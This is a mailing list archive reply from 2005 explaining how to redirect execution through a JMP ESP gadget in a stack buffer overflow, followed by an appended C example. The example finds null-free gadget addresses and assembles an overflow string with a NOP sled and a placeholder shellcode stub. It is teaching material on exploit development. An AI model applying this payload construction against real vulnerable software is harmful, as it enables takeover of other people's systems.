Vulnerability Development mailing list archives

Re: problem in rewrite RET address in Buffer OverFlow


From: Gerry Eisenhaur <gerrye () gmail com>
Date: Tue, 25 Oct 2005 21:55:38 -0600

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I think you are a little confused. When exploiting a stack-based buffer
overflow, one of the ways to control the process flow is overwriting the
stored return address with an address that will get you back to your
shellcode.

The common example used when explaining this is that when the function
where the overflow occurs returns, there will be a register that points
to (or close to) your user-controlled buffer. Say ESP points to the
buffer you control (your shellcode); you would overwrite the return
address with a JMP ESP, hence giving you control.

I hope this makes things a little clearer for you.

Gerry

Mani.682001 () gmail com wrote:
Hi list,
I am working on writing a local exploit, so I want to rewrite the RET address with an EIP (somewhere my NOPs and shellcode are),
but I have a problem with this.
The EIP address is 002F77E1. If you pay some attention you can see the first byte is "00", and if I put it in my string in
my exploit, C/C++ thinks it's the end of the string, so what can I do? I asked this question of my friend and he answered "use
User32.dll", but I opened it in a debugger and searched for "jmp eip". I found some addresses without any 00 byte, but it's not
working correctly. My question is: why do we use user32.dll and what does it do, and is there any other DLL for jumping to the
EIP address?


- --
Gerry Eisenhaur <gerrye gmail com>
PGP key:        0xB4A196698555EC78

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFDXv46tKGWaYVV7HgRAjnJAJ47NrE6YuE8KrQ1U1qFwmPevx+AcwCbBgrQ
+Lkkowe7VEcWexAZ4EnAy6g=
=c8lZ
-----END PGP SIGNATURE-----

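The technique Gerry describes (find a JMP ESP whose address contains no byte the target's string handling will choke on, put that address over the saved return address, and let ESP carry execution into the NOP sled and shellcode) can be shown end to end in a few functions. The following is an added example written for this archive page; it is not code from either poster. The module image it scans is constructed in memory with three JMP ESP gadgets planted at known offsets, the load base 0x77D40000 is an assumed value rather than anything stated in the thread, the bad-character set (0x00, 0x0A, 0x0D) is an assumption about a typical string-based target, and the "shellcode" is a three-byte placeholder stub, not a working payload. The 002F77E1 address is the one from Mani's post and is used only to show why it fails the check.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* x86 encoding of JMP ESP. */
static const uint8_t JMP_ESP[2] = { 0xFF, 0xE4 };

/* Bytes the target's string handling is assumed to terminate on:
 * 0x00 ends a C string (the 002F77E1 problem from the post), and
 * 0x0A / 0x0D end a line for gets()/fgets()-style readers. This set
 * is an assumption for the example; a real target needs its own list. */
static const uint8_t BADCHARS[] = { 0x00, 0x0A, 0x0D };
#define NBAD (sizeof BADCHARS)

/* Returns 1 if any of the four little-endian bytes of addr is a bad char. */
int addr_has_badchar(uint32_t addr)
{
    for (int i = 0; i < 4; i++) {
        uint8_t b = (uint8_t)(addr >> (8 * i));
        for (size_t j = 0; j < NBAD; j++)
            if (b == BADCHARS[j])
                return 1;
    }
    return 0;
}

/* Scan a module image for FF E4 and write the virtual addresses that
 * pass the bad-char filter into out (at most max). Returns the count. */
size_t find_jmp_esp(const uint8_t *image, size_t len, uint32_t base,
                    uint32_t *out, size_t max)
{
    size_t n = 0;
    for (size_t off = 0; off + 1 < len && n < max; off++) {
        if (image[off] != JMP_ESP[0] || image[off + 1] != JMP_ESP[1])
            continue;
        uint32_t va = base + (uint32_t)off;
        if (!addr_has_badchar(va))
            out[n++] = va;
    }
    return n;
}

/* Constructed stand-in for a DLL's code section: int3 filler with three
 * JMP ESP gadgets planted so that two of the resulting addresses contain
 * a bad byte and one is clean. The base is an assumed load address. */
#define IMAGE_LEN  0x2000
#define IMAGE_BASE 0x77D40000u

void make_module_image(uint8_t *img)
{
    memset(img, 0xCC, IMAGE_LEN);
    memcpy(img + 0x0000, JMP_ESP, 2);   /* 0x77D40000: has 0x00 -> rejected */
    memcpy(img + 0x0A12, JMP_ESP, 2);   /* 0x77D40A12: has 0x0A -> rejected */
    memcpy(img + 0x1234, JMP_ESP, 2);   /* 0x77D41234: clean */
}

/* Lay out the overflow string: filler up to the saved return address,
 * the gadget address in little-endian byte order, then the NOP sled and
 * shellcode that ESP points at once the vulnerable function returns.
 * Returns the total length, or 0 if buf is too small. */
size_t build_payload(uint8_t *buf, size_t cap, size_t ret_offset,
                     uint32_t ret_addr, size_t nops,
                     const uint8_t *shellcode, size_t sc_len)
{
    size_t need = ret_offset + 4 + nops + sc_len;
    if (need > cap)
        return 0;
    memset(buf, 'A', ret_offset);
    for (int i = 0; i < 4; i++)
        buf[ret_offset + i] = (uint8_t)(ret_addr >> (8 * i));
    memset(buf + ret_offset + 4, 0x90, nops);
    memcpy(buf + ret_offset + 4 + nops, shellcode, sc_len);
    return need;
}

/* Returns 1 if a strcpy()-style copy would carry the whole payload,
 * i.e. there is no NUL byte before its end. */
int survives_strcpy(const uint8_t *buf, size_t len)
{
    return memchr(buf, 0x00, len) == NULL;
}

int main(void)
{
    static uint8_t image[IMAGE_LEN];
    uint32_t cands[8];
    make_module_image(image);
    size_t n = find_jmp_esp(image, IMAGE_LEN, IMAGE_BASE, cands, 8);

    printf("002F77E1 usable as return address: %d\n", !addr_has_badchar(0x002F77E1u));
    for (size_t i = 0; i < n; i++)
        printf("usable JMP ESP at 0x%08X\n", (unsigned)cands[i]);
    if (n == 0)
        return 1;

    /* Placeholder stub (xor eax,eax ; int3), NUL-free; not a real payload. */
    const uint8_t stub[] = { 0x31, 0xC0, 0xCC };
    uint8_t payload[256];
    size_t len = build_payload(payload, sizeof payload, 64, cands[0], 16,
                               stub, sizeof stub);
    printf("payload %zu bytes, survives strcpy: %d\n", len,
           survives_strcpy(payload, len));
    return 0;
}
```

The offset of the saved return address (64 here) is whatever the crash analysis shows for the real target; the bad-character list must likewise come from the target, since a "jmp esp" found in a debugger is only useful if every byte of its address reaches the stack intact.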